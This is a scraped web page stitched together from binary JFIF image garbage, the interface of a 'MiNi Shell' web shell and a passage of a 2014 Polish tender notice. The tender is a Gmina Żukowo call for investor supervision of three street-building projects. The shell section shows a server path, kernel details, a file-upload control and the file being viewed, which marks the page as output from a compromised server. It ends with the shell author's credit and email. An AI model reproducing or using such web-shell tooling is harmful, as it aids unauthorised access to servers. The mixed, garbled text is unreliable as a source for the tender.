JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140403/113454-N-2014.html

<p class="kh_header"><b>Żukowo: Pełnienie nadzoru inwestorskiego nad realizacją  budowy ulic w Żukowie.</b><br>
<b>Numer ogłoszenia: 113454 - 2014; data zamieszczenia: 03.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żukowo , ul. Gdańska 52, 83-330 Żukowo, woj. pomorskie, tel. +48 58 6858300, faks +48 58 6858300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zukowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad realizacją  budowy ulic w Żukowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie nadzoru inwestorskiego nad realizacją  budowy ulic w Żukowie.
Nadzór inwestorski obejmuje branże: 

Część I - Budowa  ulicy  Broniewskiego  w  Żukowie   -  etap II:
1)	drogową,
2)	sanitarną,
3)	elektryczną,
4)	teletechniczną,

Część II - Budowa ulicy Kruczkowskiego i Dąbrowskiego w Żukowie - etap IV: 
1)	drogową,
2)	sanitarną,
3)	teletechniczną,

Część III - Budowa ulicy 1 Maja w Żukowie - etap II:
1)	drogową, 
2)	sanitarną,
3)	teletechniczną.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie będzie wymagał zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie spełniony jeżeli wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie jako strona umowy (kontraktu) zrealizował co najmniej trzy zamówienia, z których każde polegało na pełnieniu nadzoru inwestorskiego branży drogowej na budowie / przebudowie drogi / ulicy o nawierzchni rozbieralnej wraz z infrastrukturą towarzyszącą, w tym co najmniej jedno zamówienie obejmowało nawierzchnię o powierzchni min. 700 m2; 
Pod pojęciem >nawierzchnia rozbieralna< należy rozumieć nawierzchnię, której warstwa ścieralna  została  wykonana z betonowej kostki brukowej (w tym starobruk, trylinka) / kostki kamiennej / kostki granitowej itp.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia zostanie spełniony, jeżeli wykonawca wykaże, iż dysponuje lub będzie dysponował osobami posiadającymi uprawnienia do wykonywania samodzielnych funkcji w budownictwie: 
	Część I
a) 	do nadzorowania robót branży drogowej:  osobę posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie  w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, legitymującą się co najmniej                 5-cio letnim doświadczeniem zawodowym po wydaniu uprawnień w kierowaniu robotami budowlanymi / nadzorowaniu robót w zakresie dróg,
b) 	do nadzorowania robót branży sanitarnej: osobę posiadającą uprawnienia budowlane  do wykonywania samodzielnych funkcji w budownictwie w zakresie sieci i instalacji kanalizacyjnych, wodociągowych, gazowych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
c)	do nadzorowania robót branży elektrycznej: osobą  posiadającą  uprawnienia budowlane  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
d) 	do nadzorowania robót branży teletechnicznej: osobą  posiadającą  uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci i instalacji teletechnicznych;

	Część II
a) 	do nadzorowania robót branży drogowej:  osobę posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie  w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, legitymującą się co najmniej                 5-cio letnim doświadczeniem zawodowym po wydaniu uprawnień w kierowaniu robotami budowlanymi / nadzorowaniu robót w zakresie dróg,
b) 	do nadzorowania robót branży sanitarnej: osobę posiadającą uprawnienia budowlane  do wykonywania samodzielnych funkcji w budownictwie w zakresie sieci i instalacji kanalizacyjnych, wodociągowych, gazowych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
c)	do nadzorowania robót branży teletechnicznej: osobą  posiadającą  uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci i instalacji teletechnicznych;

Część III
 a) 	do nadzorowania robót branży drogowej:   osobę posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji w budownictwie  w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, legitymującą się co najmniej                 5-cio letnim doświadczeniem zawodowym po wydaniu uprawnień w kierowaniu robotami budowlanymi / nadzorowaniu robót w zakresie dróg,
b) 	do nadzorowania robót branży sanitarnej: osobę posiadającą uprawnienia budowlane  do wykonywania samodzielnych funkcji w budownictwie w zakresie sieci i instalacji kanalizacyjnych, wodociągowych, gazowych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
c)	do nadzorowania robót branży teletechnicznej: osobą  posiadającą  uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci i instalacji teletechnicznych.
	
Uprawnienia budowlane, o których mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994 r. prawo budowlane (tekst jednolity Dz. U. z  2010 r., Nr 243, poz. 1623 z późn. zm.) oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., Nr 83, poz.  578 z późn. zm.). Dopuszcza się ważne i odpowiadające im uprawnienia nadane na podstawie wcześniej obowiązujących przepisów.

W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r.                    o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394 z późn. zm.).

Inspektorzy nadzoru  muszą  być zrzeszeni we właściwych branżowo izbach samorządu zawodowego zgodnie ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (tekst jednolity - Dz. U. z 2013 r.,  poz. 932).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W WYKAZIE ZREALIZOWANYCH ZAMÓWIEŃ należy wykazać usługi potwierdzające spełnienie warunku o którym mowa w art. 22 ust. 1 ustawy prawo zamówień publicznych oraz główne usługi, których przedmiotem był nadzór inwestorski branży drogowej nad  robotami obejmującymi budowę / przebudowę / remont  drogi / ulicy o nawierzchni rozbieralnej o wartości robót powyżej 200.000,00 PLN netto. W WYKAZIE ZREALIZOWANYCH ZAMÓWIEŃ należy podać także informacje o usługach  niewykonanych i wykonanych nienależycie. Dla usług potwierdzających spełnienie warunku oraz dla wybranych przez wykonawcę głównych usług należy dołączyć dowody  potwierdzające czy usługi te zostały wykonane w sposób należyty. W przypadku wykonawców ubiegających się wspólnie                            o udzielenie zamówienia należy uwzględnić w WYKAZIE ZREALIZOWANYCH ZAMÓWIEŃ usługi wszystkich wykonawców;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o
których mowa wyżej, zastępuje się je oświadczeniem, w którym określa się także osoby uprawnione do
reprezentacji wykonawcy, złożonym przed notariuszem, właściwym organem sądowym, administracyjnym albo
organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju,
w którym wykonawca ma siedzibę lub miejsce zamieszkania. Oświadczenie powinno być wystawione nie
wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 2. W przypadku wykonawców ubiegających się
wspólnie o udzielenie zamówienia publicznego: 1) oferta powinna zawierać pełnomocnictwo ustanawiające
pełnomocnika (lidera) do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo
reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, pełnomocnictwo należy
złożyć w formie oryginału lub kopii poświadczonej przez notariusza, 2) każdy z wykonawców zobowiązany jest
do dostarczenia dokumentów / oświadczeń potwierdzających, że nie podlega wykluczeniu z postępowania na
podstawie art. 24 ust. 1 ustawy - prawo zamówień publicznych, 3) każdy z wykonawców składa INFORMACJĘ
NR 1 w zakresie przynależności do grupy kapitałowej lub braku przynależności do grupy kapitałowej. 3. Jeżeli
inaczej uregulowano zasady współpracy i reprezentacji przedsiębiorców w spółce cywilnej, do oferty należy
dołączyć pełnomocnictwo ustanawiające pełnomocnika (lidera) do reprezentowania przedsiębiorców w
postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w
sprawie zamówienia publicznego. Jeżeli oferta spółki cywilnej zostanie wybrana, zamawiający może żądać przed
zawarciem umowy w sprawie zamówienia publicznego umowy spółki cywilnej. 4. Upoważnienie do podpisania
oferty (pełnomocnictwo) winno być dołączone do oferty, o ile nie wynika to z innych dokumentów załączonych do
oferty. Pełnomocnictwo w swojej treści winno jednoznacznie wskazywać uprawnienie do podpisania oferty.
Pełnomocnictwo należy przedłożyć w formie oryginału lub kopii poświadczonej przez notariusza. 5.
OŚWIADCZENIE NR 1, INFORMACJĘ NR 1 należy złożyć w formie oryginału lub kopii poświadczonej przez
notariusza. 6. Wszystkie oświadczenia oraz inne załączniki do oferty winny być podpisane przez upoważnionego
przedstawiciela / przedstawicieli wykonawcy. 7. Wszystkie dokumenty (z zastrzeżeniem pkt 4 i pkt 5) muszą być
przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę / osoby
upoważnione do reprezentowania wykonawcy - na każdej zapisanej stronie poświadczonego dokumentu. 8. W
przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, kopie dokumentów dotyczących
danego wykonawcy są poświadczane za zgodność z oryginałem przez tego wykonawcę lub pełnomocnika.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie. 
2. 	Zakazane są zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, z wyjątkiem zmian o których mowa w ust. 3.
3.  Zmiany w umowie mogą dotyczyć:
1) 	terminu wykonania zamówienia,
2)  wysokości wynagrodzenia Inspektora Nadzoru, 
3) 	udziału osób - inspektorów nadzoru,
4) 	udziału Podwykonawców przy realizacji zamówienia.
4.  Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
1) 	przerwy w realizacji zamówienia na skutek działań podmiotów trzecich i z przyczyn niezawinionych przez Inspektora Nadzoru,
2) 	konieczności uzyskania dodatkowych uzgodnień i decyzji administracyjnych,
3) 	przedłużania odbiorów przez innych gestorów sieci i urządzeń z przyczyn niezawinionych przez wykonawcę robót budowlanych, Inspektora Nadzoru, Zamawiającego,
4) 	utrudniania przez właścicieli nieruchomości dostępu do nieruchomości,
5)	konieczności wykonania prac / robót dodatkowych, które będą niezbędne dla  prawidłowej realizacji przedmiotu zamówienia objętego nadzorem inwestorskim, a których nie można było przewidzieć na etapie składania oferty,
6)  rezygnacji z realizacji części zamówienia,
7) czasowego wstrzymania prac przez Zamawiającego.
5. 	Zmiana wysokości wynagrodzenia Inspektora Nadzoru może nastąpić w przypadku: 
     1) zmiany ustawowej stawki podatku VAT,
     2) odstąpienia (rezygnacji) od części zamówienia.
6. 	Zmiana udziału Podwykonawców może nastąpić w przypadku:
1)	skorzystania z Podwykonawców w realizacji zamówienia mimo, iż w złożonej ofercie Inspektor Nadzoru nie przewidywał realizacji części zamówienia w podwykonawstwie, 
2) 	zmiany zakresu prac realizowanych w podwykonawstwie. 
7. 	Zmiana osób - inspektorów nadzoru  może nastąpić w przypadku:
 	1)  zdarzeń losowych niezależnych od Inspektora Nadzoru,
2) konieczności czasowego zastępstwa branżowego inspektora nadzoru (np. w sytuacji choroby,  wyjazdu, urlopu itp.),
	2)  utraty uprawnień przez wskazane przez Inspektora Nadzoru osoby,
	3)  wykreślenia osób z  listy członków branżowej izby samorządu zawodowego.
8.	W przypadku zmiany osób Inspektor Nadzoru winien przedstawić Zamawiającemu nowe osoby o niegorszych kwalifikacjach i uprawnieniach w stosunku do osób, które zostały wskazane w ofercie Inspektora Nadzoru i spełniających wymagania opisane w specyfikacji istotnych warunków zamówienia.
9. 	Poza przypadkami określonymi w poprzedzających paragrafach umowy i ust. 3, zmiany umowy mogą wystąpić w następujących przypadkach:
1) 	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy,
2) 	powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w niniejszej umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie niniejszej umowy w celu jednoznacznej interpretacji zapisów przez strony umowy,
3) 	wystąpią przyczyny niezależne od stron umowy, które będą skutkowały koniecznością zastosowania innych rozwiązań, gdy zastosowanie rozwiązań przewidzianych w specyfikacji istotnych warunków zamówienia                    i specyfikacjach technicznych wykonania i odbioru robót budowlanych groziłoby niewykonaniem                           lub wadliwym wykonaniem przedmiotu zamówienia,
4) wystąpią środki ochrony prawnej w postępowaniu o zamówienie publiczne uniemożliwiające wykonanie zamówienia w terminie wskazanym w postępowaniu.  
10.Warunki dokonywania zmian:
1)  inicjowanie zmian na pisemny wniosek Inspektora Nadzoru lub Zamawiającego,
2)	uzasadnienie konieczności i wpływu zmian na realizację zamówienia,
3) w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany.
11.Zmiany zapisów umowy, które nie odnoszą się do treści oferty nie wymagają pisemnego aneksu pod rygorem nieważności. Za zmiany takie uważa się np.:
   1) zmianę koordynatora za strony Zamawiającego,
   2) zmianę rachunku bankowego, 
   3) zmiany adresowe.
12.Strony zobowiązane są do powiadomienia na piśmie o zmianach o których mowa w ust. 11.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zukowo.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Żukowo, ul.Gdańska 52, 83-330 Żukowo; Referat Zamówień Publicznych. Cena specyfikacji wraz z dokumentacją projektową w wersji papierowej - 540,00 PLN.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2014 godzina 12:00, miejsce: Urząd Gminy Żukowo, ul. Gdańska 52, 83-330 Żukowo; pok. nr 3 - Biuro Obsługi
Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Budowa  ulicy  Broniewskiego  w  Żukowie   -  etap II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - Budowa  ulicy  Broniewskiego  w  Żukowie   -  etap II.
Nadzór inwestorski obejmuje branże: 


1)	drogową,
2)	sanitarną,
3)	elektryczną,
4)	teletechniczną.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 05.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Budowa ulicy Kruczkowskiego i Dąbrowskiego w Żukowie - etap IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - Budowa ulicy Kruczkowskiego i Dąbrowskiego w Żukowie - etap IV.
Nadzór inwestorski obejmuje branże:  
1)	drogową,
2)	sanitarną,
3)	teletechniczną.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 05.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - Budowa ulicy 1 Maja w Żukowie - etap II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - Budowa ulicy 1 Maja w Żukowie - etap II.
Nadzór inwestorski obejmuje branże: 
1)	drogową, 
2)	sanitarną,
3)	teletechniczną.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 05.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com